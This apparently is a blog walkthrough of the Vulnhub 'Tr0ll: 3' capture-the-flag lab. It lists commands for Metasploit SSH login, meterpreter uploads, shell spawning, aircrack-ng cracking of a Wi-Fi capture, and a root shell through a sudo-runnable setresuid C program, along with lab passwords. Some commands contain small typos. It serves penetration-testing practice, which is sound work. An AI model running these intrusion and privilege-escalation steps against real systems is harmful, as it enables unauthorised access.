Today we are
going to solve another CTF challenge called “Tr0ll: 3” which is a part of Tr0ll
series. It is available on Vulnhub for the purpose of online penetration
practices. This lab is not that difficult if we have the proper basic knowledge
of Penetration Testing. This credit of making this lab goes to Maleus. Let’s start and
learn how to successfully breach it.
Level:
Intermediate
Since these labs
are available on the Vulnhub Website. We will be downloading the .ova file from
this link. We will
be running this lab in a Virtual Machine Player or Virtual Box. After running the lab, we used the
netdiscover command to check the IP Address of the lab. This was found out to be
192.168.1.104.
netdiscover
We are going to start out attack with a
port scan. We are going to use the leading scanning tool “nmap”. We will
perform an Aggressive scan. After the scan, we can see that the ssh port is
opened on the target machine.
nmap -A 192.168.1.104
When we started the lab, we are greeted
with a banner as shown in the given image. Here, we are hinted the password. As
we can see that after Login, “Start here” is written in the format:
start:here
Usually login credentials are written in
this format.
So, we fired up Metasploit Framework in our
Kali Linux using msfconsole command. To login we will use metasploit scanning
auxiliary. Here, we selected the auxiliary with “use” command. After that we
use the “set” command to provide the Target IP Address. Target IP Address is
provided with the parameter of rhosts. Here Rhosts means Remote Hosts. After
that we will provide username and password and exploit. After running we got
the meterpreter session. We tried to use the LinEnum script but we couldn’t find
anything using it.
msf5> use
auxiliary/scanner/ssh/ssh_login
msf5 auxiliary(scanner/ssh/ssh_login)
> set rhosts 192.168.1.104
msf5 auxiliary(scanner/ssh/ssh_login)
> set username start
msf5 auxiliary(scanner/ssh/ssh_login)
> set password here
msf5 auxiliary(scanner/ssh/ssh_login) >
exploit
meterpreter > cd /tmp
meterpreter > upload /root/LinEnum.sh
meterpreter > shell
python -c 'import
pty;pty.spawn("/bin/bash")'
chmod 777 LinEnum.sh
./LinEnum.sh
As LinEnum couldn’t help we tried to enumerate
using the find command we extracted all the files with the perm parameter. We
specifically wanted those files which have all the permissions. After a bit of
enumeration, we found a .cap file and text file. So, we download these files
using the download command on the meterpreter.
find / -type f -perm 0777 2>dev/null
meterpreter > cd
/var/log/.dist-manage
meterpreter > ls
meterpreter > download wytshadow.cap
/root/Desktop
meterpreter > cd
/.hints/lol/rofl/roflmao/this/isnt/gonna/stop/anytime/soon/still/going/lol/annoyed/almost/there/jk/no/seriously/last/one/rofl/ok/ill/stop/however/this/is/fun/ok/here/rofl/sorry/you/made/it
meterpreter > download gold_star.txt
/root/Desktop/
As we have the .cap file. It can be opened
with Wireshark. After opening the file in Wireshark, we found that all the
packets have the Protocol marked as “802.11”. This seems a hint.
Now, we already knew a bit about the 802.11,
but those who doesn’t know, let us tell you it is a protocol that it is a set
of LAN protocols, and specifies the set of media access control and physical
layer protocols for implementing wireless local area network Wi-Fi computer
communication.
Now that we know that these are the packets
of a Wifi traffic, let’s use the aircrack-ng for extracting the password. Using
the text file and the capture file as shown in the image given below. The
aircrack-ng gave us the password gaUoCe34t1.
aircrack-ng -w gold_star.txt
wytshadow.cap
So now that we have the password, let’s
upgrade the shell using the su command. We use the name wytshadow which was the
same name as the cap file. After successfully logging in, we look around to
find a file named ohhfun. It has the permission to run as root. With this in
mind, we ran the file as shown in the given figure. Here we can see that we
have the LYNX name. It is a browser. Maybe it will have to do something
further.
su wytshadow
cd
ls -al
./oohfun
Now we used the sudo -l command to find the
services we can run as root. We can see that nginx is available for us to run
as root. Now, we looked around to find some more clues related to nginx. We
traversed into the nginx directory to find the sites-enabled sites. On opening
the default file using the cat command. We see that we have the user agent as Lynx.
This means, websites here will be opened on the lynx browser only.
sudo -l
cd /etc/nginx
ls
cd sites-enabled
ls
cat default
Further, we started the nginx service as
shown in the given image. Using the netstat command we can see that we have the
port 8080 opened. This was not opened when we attempted the nmap scan.
sudo /usr/sbin/service nginx start
netstat -antp
As discussed earlier, we are going to need
a lynx browser. After successfully installing the lynx browser, we are going to
open the page associated to port we just opened.
apt install lynx
lynx http://192.168.1.104 -i key
On opening the link given in the page
through lynx, we find these login credentials. That’s was not that difficult.
Was it?
Credentials Found:
Username: genphlux
Password:
HF9nd0cr!
As we got the new credentials, we upgraded
our shell to the user genphlux user using the su command. After logging in, we
looked around to find a file named maleus. We used the file command to find the
type of the maleus file as shown in the given image. We opened the file using
the cat command to get it on our system.
su genphulx
cd
ls -al
file maleus
cat maleus
Now that we have the private key, we copied
it, in a text editor and saved it as “key”. After saving it, we changed its
permission using the chmod command. Because a private key doesn’t work with the
ALL permission. Now, we logged in using the key as shown in the image given.
After successfully logging in, we looked around and found a file named
“don’t_even_bother”. We used the file command to find its type, it came out to
be ELF 64-bit. After this we scanned the directory in which we found this file
using the ls command and all parameter to see if there are any hidden files. We
found “.viminfo” file. It seems interesting.
chmod 600 key
ssh maleus@192.168.1.104 – i key
We used the cat command to inspect the
viminfo file. On close inspection, we found a password for another user
“B^slc8I$”. This is good discovery.
cat .viminfo
Now that we have the password, let’s find
the command that can run as root. We are going to use the sudo -l command for
this. After running the following command, we find that, don’t_even_bother file
that we found earlier is the file that runs with root permissions. So in order
to escalate privilege on this machine, we are going to use this file. Let’s
first, empty the contents of this file using echo command as shown in the image
given. Now that the file is empty, let’s edit it using nano command.
sudo -l
echo "" > dont_even_bother
nano dont_even_bother.c
Now, after opening this file, we wrote this
small script inside which invokes a shell. As this file gets executed as root.
The shell it will invoke will be of root as well. After editing, we save this file
and exit nano.
int main (void){
setresuid(0, 0, 0);
system("/bin/sh");
}
Now, we as it is “.c” file, we will have to
compile it using the gcc compiler. We will compile it using the command
provided.
gcc dont_even_bother.c -o dont_even_bother
sudo /home/maleus/dont_even_bother
id
cd /root
ls
cat flag.txt
0 comments:
Post a Comment